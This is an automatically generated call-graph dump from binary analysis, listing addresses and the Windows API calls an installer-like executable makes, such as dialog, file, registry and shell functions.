3841->3842 3842->3797 3844 4044dc 3842->3844 3843->3794 3845 4045c4 18 API calls 3844->3845 3846 4044e7 GetDlgItem GetWindowRect ScreenToClient SetWindowPos 3845->3846 3847 401389 2 API calls 3846->3847 3848 40452d 3847->3848 3848->3794 3849 404535 ShowWindow 3848->3849 3850 404610 SendMessageW 3849->3850 3851 40454d 3850->3851 3851->3797 3853 4066a5 17 API calls 3852->3853 3854 4045cf SetDlgItemTextW 3853->3854 3854->3789 3856 4045a4 3855->3856 3857 4045aa SendMessageW 3855->3857 3856->3857 3857->3816 3859 4046ee 3858->3859 3860 404643 GetWindowLongW 3858->3860 3859->3794 3860->3859 3861 404658 3860->3861 3861->3859 3862 404685 GetSysColor 3861->3862 3863 404688 3861->3863 3862->3863 3864 404698 SetBkMode 3863->3864 3865 40468e SetTextColor 3863->3865 3866 4046b0 GetSysColor 3864->3866 3867 4046b6 3864->3867 3865->3864 3866->3867 3868 4046c7 3867->3868 3869 4046bd SetBkColor 3867->3869 3868->3859 3870 4046e1 CreateBrushIndirect 3868->3870 3871 4046da DeleteObject 3868->3871 3869->3868 3870->3859 3871->3870 3872->3829 3873->3834 3874->3836 3974 4016cc 3975 402da6 17 API calls 3974->3975 3976 4016d2 GetFullPathNameW 3975->3976 3977 4016ec 3976->3977 3983 40170e 3976->3983 3979 40699e 2 API calls 3977->3979 3977->3983 3978 401723 GetShortPathNameW 3980 402c2a 3978->3980 3981 4016fe 3979->3981 3981->3983 3984 406668 lstrcpynW 3981->3984 3983->3978 3983->3980 3984->3983 3985 401e4e GetDC 3986 402d84 17 API calls 3985->3986 3987 401e60 GetDeviceCaps MulDiv ReleaseDC 3986->3987 3988 402d84 17 API calls 3987->3988 3989 401e91 3988->3989 3990 4066a5 17 API calls 3989->3990 3991 401ece CreateFontIndirectW 3990->3991 3992 402638 3991->3992 3992->3992 3993 402950 3994 402da6 17 API calls 3993->3994 3996 40295c 3994->3996 3995 402972 3998 406133 2 API calls 3995->3998 3996->3995 3997 402da6 17 API calls 3996->3997 3997->3995 3999 402978 3998->3999 4021 406158 GetFileAttributesW CreateFileW 3999->4021 4001 402985 4002 402a3b 4001->4002 4003 4029a0 GlobalAlloc 4001->4003 4004 402a23 4001->4004 4005 402a42 DeleteFileW 4002->4005 4006 402a55 4002->4006 4003->4004 4007 4029b9 4003->4007 4008 403371 44 API calls 4004->4008 4005->4006 4022 4035f8 SetFilePointer 4007->4022 4010 402a30 CloseHandle 4008->4010 4010->4002 4011 4029bf 4012 4035e2 ReadFile 4011->4012 4013 4029c8 GlobalAlloc 4012->4013 4014 4029d8 4013->4014 4015 402a0c 4013->4015 4016 403371 44 API calls 4014->4016 4017 40620a WriteFile 4015->4017 4020 4029e5 4016->4020 4018 402a18 GlobalFree 4017->4018 4018->4004 4019 402a03 GlobalFree 4019->4015 4020->4019 4021->4001 4022->4011 4030 403cd5 4031 403ce0 4030->4031 4032 403ce4 4031->4032 4033 403ce7 GlobalAlloc 4031->4033 4033->4032 4034 401956 4035 402da6 17 API calls 4034->4035 4036 40195d lstrlenW 4035->4036 4037 402638 4036->4037 4038 4014d7 4039 402d84 17 API calls 4038->4039 4040 4014dd Sleep 4039->4040 4042 402c2a 4040->4042 4043 4020d8 4044 4020ea 4043->4044 4054 40219c 4043->4054 4045 402da6 17 API calls 4044->4045 4046 4020f1 4045->4046 4048 402da6 17 API calls 4046->4048 4047 401423 24 API calls 4050 4022f6 4047->4050 4049 4020fa 4048->4049 4051 402110 LoadLibraryExW 4049->4051 4052 402102 GetModuleHandleW 4049->4052 4053 402121 4051->4053 4051->4054 4052->4051 4052->4053 4063 406aa4 4053->4063 4054->4047 4057 402132 4060 401423 24 API calls 4057->4060 4061 402142 4057->4061 4058 40216b 4059 4056ca 24 API calls 4058->4059 4059->4061 4060->4061 4061->4050 4062 40218e FreeLibrary 4061->4062 4062->4050 4068 40668a WideCharToMultiByte 4063->4068 4065 406ac1 4066 406ac8 GetProcAddress 4065->4066 4067 40212c 4065->4067 4066->4067 4067->4057 4067->4058 4068->4065 4069 402b59 4070 402b60 4069->4070 4071 402bab 4069->4071 4073 402ba9 4070->4073 4075 402d84 17 API calls 4070->4075 4072 406a35 5 API calls 4071->4072 4074 402bb2 4072->4074 4076 402da6 17 API calls 4074->4076 4077 402b6e 4075->4077 4078 402bbb 4076->4078 4079 402d84 17 API calls 4077->4079 4078->4073 4080 402bbf IIDFromString 4078->4080 4082 402b7a 4079->4082 4080->4073 4081 402bce 4080->4081 4081->4073 4087 406668 lstrcpynW 4081->4087 4086 4065af wsprintfW 4082->4086 4085 402beb CoTaskMemFree 4085->4073 4086->4073 4087->4085 4088 402a5b 4089 402d84 17 API calls 4088->4089 4090 402a61 4089->4090 4091 402aa4 4090->4091 4092 402a88 4090->4092 4097 40292e 4090->4097 4094 402abe 4091->4094 4095 402aae 4091->4095 4093 402a8d 4092->4093 4101 402a9e 4092->4101 4102 406668 lstrcpynW 4093->4102 4096 4066a5 17 API calls 4094->4096 4098 402d84 17 API calls 4095->4098 4096->4101 4098->4101 4101->4097 4103 4065af wsprintfW 4101->4103 4102->4097 4103->4097 3888 40175c 3889 402da6 17 API calls 3888->3889 3890 401763 3889->3890 3891 406187 2 API calls 3890->3891 3892 40176a 3891->3892 3893 406187 2 API calls 3892->3893 3893->3892 4104 401d5d 4105 402d84 17 API calls 4104->4105 4106 401d6e SetWindowLongW 4105->4106 4107 402c2a 4106->4107 4108 4028de 4109 4028e6 4108->4109 4110 4028ea FindNextFileW 4109->4110 4112 4028fc 4109->4112 4111 402943 4110->4111 4110->4112 4114 406668 lstrcpynW 4111->4114 4114->4112 4115 406d5f 4121 406be3 4115->4121 4116 40754e 4117 406c64 GlobalFree 4118 406c6d GlobalAlloc 4117->4118 4118->4116 4118->4121 4119 406ce4 GlobalAlloc 4119->4116 4119->4121 4120 406cdb GlobalFree 4120->4119 4121->4116 4121->4117 4121->4118 4121->4119 4121->4120 4122 401563 4123 402ba4 4122->4123 4126 4065af wsprintfW 4123->4126 4125 402ba9 4126->4125 4127 401968 4128 402d84 17 API calls 4127->4128 4129 40196f 4128->4129 4130 402d84 17 API calls 4129->4130 4131 40197c 4130->4131 4132 402da6 17 API calls 4131->4132 4133 401993 lstrlenW 4132->4133 4135 4019a4 4133->4135 4134 4019e5 4135->4134 4139 406668 lstrcpynW 4135->4139 4137 4019d5 4137->4134 4138 4019da lstrlenW 4137->4138 4138->4134 4139->4137 4147 40166a 4148 402da6 17 API calls 4147->4148 4149 401670 4148->4149 4150 40699e 2 API calls 4149->4150 4151 401676 4150->4151 4152 402aeb 4153 402d84 17 API calls 4152->4153 4154 402af1 4153->4154 4155 4066a5 17 API calls 4154->4155 4156 40292e 4154->4156 4155->4156 4157 4026ec 4158 402d84 17 API calls 4157->4158 4159 4026fb 4158->4159 4160 402745 ReadFile 4159->4160 4161 4061db ReadFile 4159->4161 4163 402785 MultiByteToWideChar 4159->4163 4164 40283a 4159->4164 4166 4027ab SetFilePointer MultiByteToWideChar 4159->4166 4167 40284b 4159->4167 4169 402838 4159->4169 4170 406239 SetFilePointer 4159->4170 4160->4159 4160->4169 4161->4159 4163->4159 4179 4065af wsprintfW 4164->4179 4166->4159 4168 40286c SetFilePointer 4167->4168 4167->4169 4168->4169 4171 406255 4170->4171 4174 40626d 4170->4174 4172 4061db ReadFile 4171->4172 4173 406261 4172->4173 4173->4174 4175 406276 SetFilePointer 4173->4175 4176 40629e SetFilePointer 4173->4176 4174->4159 4175->4176 4177 406281 4175->4177 4176->4174 4178 40620a WriteFile 4177->4178 4178->4174 4179->4169 4180 404a6e 4181 404aa4 4180->4181 4182 404a7e 4180->4182 4184 40462b 8 API calls 4181->4184 4183 4045c4 18 API calls 4182->4183 4185 404a8b SetDlgItemTextW 4183->4185 4186 404ab0 4184->4186 4185->4181 3894 40176f 3895 402da6 17 API calls 3894->3895 3896 401776 3895->3896 3897 401796 3896->3897 3898 40179e 3896->3898 3933 406668 lstrcpynW 3897->3933 3934 406668 lstrcpynW 3898->3934 3901 40179c 3905 4068ef 5 API calls 3901->3905 3902 4017a9 3903 405f37 3 API calls 3902->3903 3904 4017af lstrcatW 3903->3904 3904->3901 3925 4017bb 3905->3925 3906 40699e 2 API calls 3906->3925 3907 406133 2 API calls 3907->3925 3909 4017cd CompareFileTime 3909->3925 3910 40188d 3912 4056ca 24 API calls 3910->3912 3911 401864 3913 4056ca 24 API calls 3911->3913 3921 401879 3911->3921 3914 401897 3912->3914 3913->3921 3915 403371 44 API calls 3914->3915 3916 4018aa 3915->3916 3917 4018be SetFileTime 3916->3917 3918 4018d0 FindCloseChangeNotification 3916->3918 3917->3918 3920 4018e1 3918->3920 3918->3921 3919 4066a5 17 API calls 3919->3925 3923 4018e6 3920->3923 3924 4018f9 3920->3924 3922 406668 lstrcpynW 3922->3925 3926 4066a5 17 API calls 3923->3926 3927 4066a5 17 API calls 3924->3927 3925->3906 3925->3907 3925->3909 3925->3910 3925->3911 3925->3919 3925->3922 3928 405cc8 MessageBoxIndirectW 3925->3928 3932 406158 GetFileAttributesW CreateFileW 3925->3932 3929 4018ee lstrcatW 3926->3929 3930 401901 3927->3930 3928->3925 3929->3930 3931 405cc8 MessageBoxIndirectW 3930->3931 3931->3921 3932->3925 3933->3901 3934->3902 4187 401a72 4188 402d84 17 API calls 4187->4188 4189 401a7b 4188->4189 4190 402d84 17 API calls 4189->4190 4191 401a20 4190->4191 4192 401573 4193 401583 ShowWindow 4192->4193 4194 40158c 4192->4194 4193->4194 4195 402c2a 4194->4195 4196 40159a ShowWindow 4194->4196 4196->4195 4197 4023f4 4198 402da6 17 API calls 4197->4198 4199 402403 4198->4199 4200 402da6 17 API calls 4199->4200 4201 40240c 4200->4201 4202 402da6 17 API calls 4201->4202 4203 402416 GetPrivateProfileStringW 4202->4203 4204 4014f5 SetForegroundWindow 4205 402c2a 4204->4205 4206 401ff6 4207 402da6 17 API calls 4206->4207 4208 401ffd 4207->4208 4209 40699e 2 API calls 4208->4209 4210 402003 4209->4210 4212 402014 4210->4212 4213 4065af wsprintfW 4210->4213 4213->4212 4214 401b77 4215 402da6 17 API calls 4214->4215 4216 401b7e 4215->4216 4217 402d84 17 API calls 4216->4217 4218 401b87 wsprintfW 4217->4218 4219 402c2a 4218->4219 4220 4046fa lstrcpynW lstrlenW 4221 40167b 4222 402da6 17 API calls 4221->4222 4223 401682 4222->4223 4224 402da6 17 API calls 4223->4224 4225 40168b 4224->4225 4226 402da6 17 API calls 4225->4226 4227 401694 MoveFileW 4226->4227 4228 4016a0 4227->4228 4229 4016a7 4227->4229 4231 401423 24 API calls 4228->4231 4230 40699e 2 API calls 4229->4230 4233 4022f6 4229->4233 4232 4016b6 4230->4232 4231->4233 4232->4233 4234 406428 36 API calls 4232->4234 4234->4228 4242 4019ff 4243 402da6 17 API calls 4242->4243 4244 401a06 4243->4244 4245 402da6 17 API calls 4244->4245 4246 401a0f 4245->4246 4247 401a16 lstrcmpiW 4246->4247 4248 401a28 lstrcmpW 4246->4248 4249 401a1c 4247->4249 4248->4249 4250 4022ff 4251 402da6 17 API calls 4250->4251 4252 402305 4251->4252 4253 402da6 17 API calls 4252->4253 4254 40230e 4253->4254 4255 402da6 17 API calls 4254->4255 4256 402317 4255->4256 4257 40699e 2 API calls 4256->4257 4258 402320 4257->4258 4259 402331 lstrlenW lstrlenW 4258->4259 4260 402324 4258->4260 4262 4056ca 24 API calls 4259->4262 4261 4056ca 24 API calls 4260->4261 4264 40232c 4260->4264 4261->4264 4263 40236f SHFileOperationW 4262->4263 4263->4260 4263->4264 4265 401000 4266 401037 BeginPaint GetClientRect 4265->4266 4267 40100c DefWindowProcW 4265->4267 4269 4010f3 4266->4269 4270 401179 4267->4270 4271 401073 CreateBrushIndirect FillRect DeleteObject 4269->4271 4272 4010fc 4269->4272 4271->4269 4273 401102 CreateFontIndirectW 4272->4273 4274 401167 EndPaint 4272->4274 4273->4274 4275 401112 6 API calls 4273->4275 4274->4270 4275->4274 4276 401d81 4277 401d94 GetDlgItem 4276->4277 4278 401d87 4276->4278 4280 401d8e 4277->4280 4279 402d84 17 API calls 4278->4279 4279->4280 4281 401dd5 GetClientRect LoadImageW SendMessageW 4280->4281 4283 402da6 17 API calls 4280->4283 4284 401e33 4281->4284 4286 401e3f 4281->4286 4283->4281 4285 401e38 DeleteObject 4284->4285 4284->4286 4285->4286 4287 401503 4288 40150b 4287->4288 4290 40151e 4287->4290 4289 402d84 17 API calls 4288->4289 4289->4290 4291 404783 4292 40479b 4291->4292 4296 4048b5 4291->4296 4297 4045c4 18 API calls 4292->4297 4293 40491f 4294 4049e9 4293->4294 4295 404929 GetDlgItem 4293->4295 4302 40462b 8 API calls 4294->4302 4298 404943 4295->4298 4299 4049aa 4295->4299 4296->4293 4296->4294 4300 4048f0 GetDlgItem SendMessageW 4296->4300 4301 404802 4297->4301 4298->4299 4307 404969 SendMessageW LoadCursorW SetCursor 4298->4307 4299->4294 4303 4049bc 4299->4303 4324 4045e6 EnableWindow 4300->4324 4305 4045c4 18 API calls 4301->4305 4306 4049e4 4302->4306 4308 4049d2 4303->4308 4309 4049c2 SendMessageW 4303->4309 4311 40480f CheckDlgButton 4305->4311 4328 404a32 4307->4328 4308->4306 4314 4049d8 SendMessageW 4308->4314 4309->4308 4310 40491a 4325 404a0e 4310->4325 4322 4045e6 EnableWindow 4311->4322 4314->4306 4317 40482d GetDlgItem 4323 4045f9 SendMessageW 4317->4323 4319 404843 SendMessageW 4320 404860 GetSysColor 4319->4320 4321 404869 SendMessageW SendMessageW lstrlenW SendMessageW SendMessageW 4319->4321 4320->4321 4321->4306 4322->4317 4323->4319 4324->4310 4326 404a21 SendMessageW 4325->4326 4327 404a1c 4325->4327 4326->4293 4327->4326 4331 405c8e ShellExecuteExW 4328->4331 4330 404998 LoadCursorW SetCursor 4330->4299 4331->4330 4332 402383 4333 40238a 4332->4333 4336 40239d 4332->4336 4334 4066a5 17 API calls 4333->4334 4335 402397 4334->4335 4337 405cc8 MessageBoxIndirectW 4335->4337 4337->4336 4338 402c05 SendMessageW 4339 402c2a 4338->4339 4340 402c1f InvalidateRect 4338->4340 4340->4339 4341 405809 4342 4059b3 4341->4342 4343 40582a GetDlgItem GetDlgItem GetDlgItem 4341->4343 4345 4059e4 4342->4345 4346 4059bc GetDlgItem CreateThread CloseHandle 4342->4346 4386 4045f9 SendMessageW 4343->4386 4348 405a0f 4345->4348 4349 405a34 4345->4349 4350 4059fb ShowWindow ShowWindow 4345->4350 4346->4345 4347 40589a 4352 4058a1 GetClientRect GetSystemMetrics SendMessageW SendMessageW 4347->4352 4351 405a6f 4348->4351 4354 405a23 4348->4354 4355 405a49 ShowWindow 4348->4355 4356 40462b 8 API calls 4349->4356 4388 4045f9 SendMessageW 4350->4388 4351->4349 4361 405a7d SendMessageW 4351->4361 4359 4058f3 SendMessageW SendMessageW 4352->4359 4360 40590f 4352->4360 4362 40459d SendMessageW 4354->4362 4357 405a69 4355->4357 4358 405a5b 4355->4358 4367 405a42 4356->4367 4364 40459d SendMessageW 4357->4364 4363 4056ca 24 API calls 4358->4363 4359->4360 4365 405922 4360->4365 4366 405914 SendMessageW 4360->4366 4361->4367 4368 405a96 CreatePopupMenu 4361->4368 4362->4349 4363->4357 4364->4351 4370 4045c4 18 API calls 4365->4370 4366->4365 4369 4066a5 17 API calls 4368->4369 4371 405aa6 AppendMenuW 4369->4371 4372 405932 4370->4372 4373 405ac3 GetWindowRect 4371->4373 4374 405ad6 TrackPopupMenu 4371->4374 4375 40593b ShowWindow 4372->4375 4376 40596f GetDlgItem SendMessageW 4372->4376 4373->4374 4374->4367 4378 405af1 4374->4378 4379 405951 ShowWindow 4375->4379 4380 40595e 4375->4380 4376->4367 4377 405996 SendMessageW SendMessageW 4376->4377 4377->4367 4381 405b0d SendMessageW 4378->4381 4379->4380 4387 4045f9 SendMessageW 4380->4387 4381->4381 4382 405b2a OpenClipboard EmptyClipboard GlobalAlloc GlobalLock 4381->4382 4384 405b4f SendMessageW 4382->4384 4384->4384 4385 405b78 GlobalUnlock SetClipboardData CloseClipboard 4384->4385 4385->4367 4386->4347 4387->4376 4388->4348 4389 40248a 4390 402da6 17 API calls 4389->4390 4391 40249c 4390->4391 4392 402da6 17 API calls 4391->4392 4393 4024a6 4392->4393 4406 402e36 4393->4406 4396 40292e 4397 4024de 4399 4024ea 4397->4399 4402 402d84 17 API calls 4397->4402 4398 402da6 17 API calls 4401 4024d4 lstrlenW 4398->4401 4400 402509 RegSetValueExW 4399->4400 4403 403371 44 API calls 4399->4403 4404 40251f RegCloseKey 4400->4404 4401->4397 4402->4399 4403->4400 4404->4396 4407 402e51 4406->4407 4410 406503 4407->4410 4411 406512 4410->4411 4412 4024b6 4411->4412 4413 40651d RegCreateKeyExW 4411->4413 4412->4396 4412->4397 4412->4398 4413->4412 4414 404e0b 4415 404e37 4414->4415 4416 404e1b 4414->4416 4418 404e6a 4415->4418 4419 404e3d SHGetPathFromIDListW 4415->4419 4425 405cac GetDlgItemTextW 4416->4425 4420 404e54 SendMessageW 4419->4420 4421 404e4d 4419->4421 4420->4418 4423 40140b 2 API calls 4421->4423 4422 404e28 SendMessageW 4422->4415 4423->4420 4425->4422 4426 40290b 4427 402da6 17 API calls 4426->4427 4428 402912 FindFirstFileW 4427->4428 4429 40293a 4428->4429 4433 402925 4428->4433 4434 4065af wsprintfW 4429->4434 4431 402943 4435 406668 lstrcpynW 4431->4435 4434->4431 4435->4433 4436 40190c 4437 401943 4436->4437 4438 402da6 17 API calls 4437->4438 4439 401948 4438->4439 4440 405d74 67 API calls 4439->4440 4441 401951 4440->4441 4442 40190f 4443 402da6 17 API calls 4442->4443 4444 401916 4443->4444 4445 405cc8 MessageBoxIndirectW 4444->4445 4446 40191f 4445->4446 4447 401491 4448 4056ca 24 API calls 4447->4448 4449 401498 4448->4449 4450 402891 4451 402898 4450->4451 4452 402ba9 4450->4452 4453 402d84 17 API calls 4451->4453 4454 40289f 4453->4454 4455 4028ae SetFilePointer 4454->4455 4455->4452 4456 4028be 4455->4456 4458 4065af wsprintfW 4456->4458 4458->4452 4459 401f12 4460 402da6 17 API calls 4459->4460 4461 401f18 4460->4461 4462 402da6 17 API calls 4461->4462 4463 401f21 4462->4463 4464 402da6 17 API calls 4463->4464 4465 401f2a 4464->4465 4466 402da6 17 API calls 4465->4466 4467 401f33 4466->4467 4468 401423 24 API calls 4467->4468 4469 401f3a 4468->4469 4476 405c8e ShellExecuteExW 4469->4476 4471 401f82 4472 406ae0 5 API calls 4471->4472 4474 40292e 4471->4474 4473 401f9f CloseHandle 4472->4473 4473->4474 4476->4471 4477 402f93 4478 402fa5 SetTimer 4477->4478 4479 402fbe 4477->4479 4478->4479 4480 40300c 4479->4480 4481 403012 MulDiv 4479->4481 4482 402fcc wsprintfW SetWindowTextW SetDlgItemTextW 4481->4482 4482->4480 4498 401d17 4499 402d84 17 API calls 4498->4499 4500 401d1d IsWindow 4499->4500 4501 401a20 4500->4501 4502 401b9b 4503 401ba8 4502->4503 4504 401bec 4502->4504 4511 401bbf 4503->4511 4513 401c31 4503->4513 4505 401bf1 4504->4505 4506 401c16 GlobalAlloc 4504->4506 4510 40239d 4505->4510 4523 406668 lstrcpynW 4505->4523 4508 4066a5 17 API calls 4506->4508 4507 4066a5 17 API calls 4509 402397 4507->4509 4508->4513 4517 405cc8 MessageBoxIndirectW 4509->4517 4521 406668 lstrcpynW 4511->4521 4513->4507 4513->4510 4515 401c03 GlobalFree 4515->4510 4516 401bce 4522 406668 lstrcpynW 4516->4522 4517->4510 4519 401bdd 4524 406668 lstrcpynW 4519->4524 4521->4516 4522->4519 4523->4515 4524->4510 4525 40261c 4526 402da6 17 API calls 4525->4526 4527 402623 4526->4527 4530 406158 GetFileAttributesW CreateFileW 4527->4530 4529 40262f 4530->4529 4538 40149e 4539 4014ac PostQuitMessage 4538->4539 4540 40239d 4538->4540 4539->4540 4541 40259e 4551 402de6 4541->4551 4544 402d84 17 API calls 4545 4025b1 4544->4545 4546 4025d9 RegEnumValueW 4545->4546 4547 4025cd RegEnumKeyW 4545->4547 4549 40292e 4545->4549 4548 4025ee RegCloseKey 4546->4548 4547->4548 4548->4549 4552 402da6 17 API calls 4551->4552 4553 402dfd 4552->4553 4554 4064d5 RegOpenKeyExW 4553->4554 4555 4025a8 4554->4555 4555->4544 4556 4015a3 4557 402da6 17 API calls 4556->4557 4558 4015aa SetFileAttributesW 4557->4558 4559 4015bc 4558->4559 3755 401fa4 3756 402da6 17 API calls 3755->3756 3757 401faa 3756->3757 3758 4056ca 24 API calls 3757->3758 3759 401fb4 3758->3759 3760 405c4b 2 API calls 3759->3760 3761 401fba 3760->3761 3762 401fdd CloseHandle 3761->3762 3766 40292e 3761->3766 3770 406ae0 WaitForSingleObject 3761->3770 3762->3766 3765 401fcf 3767 401fd4 3765->3767 3768 401fdf 3765->3768 3775 4065af wsprintfW 3767->3775 3768->3762 3771 406afa 3770->3771 3772 406b0c GetExitCodeProcess 3771->3772 3773 406a71 2 API calls 3771->3773 3772->3765 3774 406b01 WaitForSingleObject 3773->3774 3774->3771 3775->3762 3875 403c25 3876 403c40 3875->3876 3877 403c36 CloseHandle 3875->3877 3878 403c54 3876->3878 3879 403c4a CloseHandle 3876->3879 3877->3876 3884 403c82 3878->3884 3879->3878 3882 405d74 67 API calls 3883 403c65 3882->3883 3885 403c90 3884->3885 3886 403c59 3885->3886 3887 403c95 FreeLibrary GlobalFree 3885->3887 3886->3882 3887->3886 3887->3887 4560 40202a 4561 402da6 17 API calls 4560->4561 4562 402031 4561->4562 4563 406a35 5 API calls 4562->4563 4564 402040 4563->4564 4565 40205c GlobalAlloc 4564->4565 4566 4020cc 4564->4566 4565->4566 4567 402070 4565->4567 4568 406a35 5 API calls 4567->4568 4569 402077 4568->4569 4570 406a35 5 API calls 4569->4570 4571 402081 4570->4571 4571->4566 4575 4065af wsprintfW 4571->4575 4573 4020ba 4576 4065af wsprintfW 4573->4576 4575->4573 4576->4566 4577 40252a 4578 402de6 17 API calls 4577->4578 4579 402534 4578->4579 4580 402da6 17 API calls 4579->4580 4581 40253d 4580->4581 4582 402548 RegQueryValueExW 4581->4582 4585 40292e 4581->4585 4583 40256e RegCloseKey 4582->4583 4584 402568 4582->4584 4583->4585 4584->4583 4588 4065af wsprintfW 4584->4588 4588->4583 4589 4021aa 4590 402da6 17 API calls 4589->4590 4591 4021b1 4590->4591 4592 402da6 17 API calls 4591->4592 4593 4021bb 4592->4593 4594 402da6 17 API calls 4593->4594 4595 4021c5 4594->4595 4596 402da6 17 API calls 4595->4596 4597 4021cf 4596->4597 4598 402da6 17 API calls 4597->4598 4599 4021d9 4598->4599 4600 402218 CoCreateInstance 4599->4600 4601 402da6 17 API calls 4599->4601 4604 402237 4600->4604 4601->4600 4602 401423 24 API calls 4603 4022f6 4602->4603 4604->4602 4604->4603 4612 401a30 4613 402da6 17 API calls 4612->4613 4614 401a39 ExpandEnvironmentStringsW 4613->4614 4615 401a60 4614->4615 4616 401a4d 4614->4616 4616->4615 4617 401a52 lstrcmpW 4616->4617 4617->4615 4618 405031 GetDlgItem GetDlgItem 4619 405083 7 API calls 4618->4619 4620 4052a8 4618->4620 4621 40512a DeleteObject 4619->4621 4622 40511d SendMessageW 4619->4622 4625 40538a 4620->4625 4652 405317 4620->4652 4672 404f7f SendMessageW 4620->4672 4623 405133 4621->4623 4622->4621 4624 40516a 4623->4624 4628 4066a5 17 API calls 4623->4628 4626 4045c4 18 API calls 4624->4626 4627 405436 4625->4627 4631 40529b 4625->4631 4637 4053e3 SendMessageW 4625->4637 4630 40517e 4626->4630 4632 405440 SendMessageW 4627->4632 4633 405448 4627->4633 4629 40514c SendMessageW SendMessageW 4628->4629 4629->4623 4636 4045c4 18 API calls 4630->4636 4634 40462b 8 API calls 4631->4634 4632->4633 4640 405461 4633->4640 4641 40545a ImageList_Destroy 4633->4641 4648 405471 4633->4648 4639 405637 4634->4639 4653 40518f 4636->4653 4637->4631 4643 4053f8 SendMessageW 4637->4643 4638 40537c SendMessageW 4638->4625 4644 40546a GlobalFree 4640->4644 4640->4648 4641->4640 4642 4055eb 4642->4631 4649 4055fd ShowWindow GetDlgItem ShowWindow 4642->4649 4646 40540b 4643->4646 4644->4648 4645 40526a GetWindowLongW SetWindowLongW 4647 405283 4645->4647 4657 40541c SendMessageW 4646->4657 4650 4052a0 4647->4650 4651 405288 ShowWindow 4647->4651 4648->4642 4665 4054ac 4648->4665 4677 404fff 4648->4677 4649->4631 4671 4045f9 SendMessageW 4650->4671 4670 4045f9 SendMessageW 4651->4670 4652->4625 4652->4638 4653->4645 4656 4051e2 SendMessageW 4653->4656 4658 405265 4653->4658 4659 405220 SendMessageW 4653->4659 4660 405234 SendMessageW 4653->4660 4656->4653 4657->4627 4658->4645 4658->4647 4659->4653 4660->4653 4662 4055b6 4663 4055c1 InvalidateRect 4662->4663 4666 4055cd 4662->4666 4663->4666 4664 4054da SendMessageW 4668 4054f0 4664->4668 4665->4664 4665->4668 4666->4642 4686 404f3a 4666->4686 4667 405564 SendMessageW SendMessageW 4667->4668 4668->4662 4668->4667 4670->4631 4671->4620 4673 404fa2 GetMessagePos ScreenToClient SendMessageW 4672->4673 4674 404fde SendMessageW 4672->4674 4675 404fd6 4673->4675 4676 404fdb 4673->4676 4674->4675 4675->4652 4676->4674 4689 406668 lstrcpynW 4677->4689 4679 405012 4690 4065af wsprintfW 4679->4690 4681 40501c 4682 40140b 2 API calls 4681->4682 4683 405025 4682->4683 4691 406668 lstrcpynW 4683->4691 4685 40502c 4685->4665 4692 404e71 4686->4692 4688 404f4f 4688->4642 4689->4679 4690->4681 4691->4685 4693 404e8a 4692->4693 4694 4066a5 17 API calls 4693->4694 4695 404eee 4694->4695 4696 4066a5 17 API calls 4695->4696 4697 404ef9 4696->4697 4698 4066a5 17 API calls 4697->4698 4699 404f0f lstrlenW wsprintfW SetDlgItemTextW 4698->4699 4699->4688 4705 4023b2 4706 4023ba 4705->4706 4709 4023c0 4705->4709 4707 402da6 17 API calls 4706->4707 4707->4709 4708 4023ce 4711 4023dc 4708->4711 4712 402da6 17 API calls 4708->4712 4709->4708 4710 402da6 17 API calls 4709->4710 4710->4708 4713 402da6 17 API calls 4711->4713 4712->4711 4714 4023e5 WritePrivateProfileStringW 4713->4714 4715 404734 lstrlenW 4716 404753 4715->4716 4717 404755 WideCharToMultiByte 4715->4717 4716->4717 4718 402434 4719 402467 4718->4719 4720 40243c 4718->4720 4722 402da6 17 API calls 4719->4722 4721 402de6 17 API calls 4720->4721 4723 402443 4721->4723 4724 40246e 4722->4724 4726 402da6 17 API calls 4723->4726 4728 40247b 4723->4728 4729 402e64 4724->4729 4727 402454 RegDeleteValueW RegCloseKey 4726->4727 4727->4728 4730 402e78 4729->4730 4732 402e71 4729->4732 4730->4732 4733 402ea9 4730->4733 4732->4728 4734 4064d5 RegOpenKeyExW 4733->4734 4735 402ed7 4734->4735 4736 402ee7 RegEnumValueW 4735->4736 4743 402f81 4735->4743 4745 402f0a 4735->4745 4737 402f71 RegCloseKey 4736->4737 4736->4745 4737->4743 4738 402f46 RegEnumKeyW 4739 402f4f RegCloseKey 4738->4739 4738->4745 4740 406a35 5 API calls 4739->4740 4741 402f5f 4740->4741 4741->4743 4744 402f63 RegDeleteKeyW 4741->4744 4742 402ea9 6 API calls 4742->4745 4743->4732 4744->4743 4745->4737 4745->4738 4745->4739 4745->4742 4746 401735 4747 402da6 17 API calls 4746->4747 4748 40173c SearchPathW 4747->4748 4749 401757 4748->4749 4750 404ab5 4751 404ae1 4750->4751 4752 404af2 4750->4752 4811 405cac GetDlgItemTextW 4751->4811 4754 404afe GetDlgItem 4752->4754 4759 404b5d 4752->4759 4757 404b12 4754->4757 4755 404c41 4760 404df0 4755->4760 4813 405cac GetDlgItemTextW 4755->4813 4756 404aec 4758 4068ef 5 API calls 4756->4758 4762 404b26 SetWindowTextW 4757->4762 4763 405fe2 4 API calls 4757->4763 4758->4752 4759->4755 4759->4760 4764 4066a5 17 API calls 4759->4764 4767 40462b 8 API calls 4760->4767 4766 4045c4 18 API calls 4762->4766 4768 404b1c 4763->4768 4769 404bd1 SHBrowseForFolderW 4764->4769 4765 404c71 4770 40603f 18 API calls 4765->4770 4771 404b42 4766->4771 4772 404e04 4767->4772 4768->4762 4776 405f37 3 API calls 4768->4776 4769->4755 4773 404be9 CoTaskMemFree 4769->4773 4774 404c77 4770->4774 4775 4045c4 18 API calls 4771->4775 4777 405f37 3 API calls 4773->4777 4814 406668 lstrcpynW 4774->4814 4778 404b50 4775->4778 4776->4762 4779 404bf6 4777->4779 4812 4045f9 SendMessageW 4778->4812 4782 404c2d SetDlgItemTextW 4779->4782 4787 4066a5 17 API calls 4779->4787 4782->4755 4783 404b56 4785 406a35 5 API calls 4783->4785 4784 404c8e 4786 406a35 5 API calls 4784->4786 4785->4759 4793 404c95 4786->4793 4788 404c15 lstrcmpiW 4787->4788 4788->4782 4791 404c26 lstrcatW 4788->4791 4789 404cd6 4815 406668 lstrcpynW 4789->4815 4791->4782 4792 404cdd 4794 405fe2 4 API calls 4792->4794 4793->4789 4797 405f83 2 API calls 4793->4797 4799 404d2e 4793->4799 4795 404ce3 GetDiskFreeSpaceW 4794->4795 4798 404d07 MulDiv 4795->4798 4795->4799 4797->4793 4798->4799 4801 404f3a 20 API calls 4799->4801 4809 404d9f 4799->4809 4800 404dc2 4816 4045e6 EnableWindow 4800->4816 4803 404d8c 4801->4803 4802 40140b 2 API calls 4802->4800 4805 404da1 SetDlgItemTextW 4803->4805 4806 404d91 4803->4806 4805->4809 4807 404e71 20 API calls 4806->4807 4807->4809 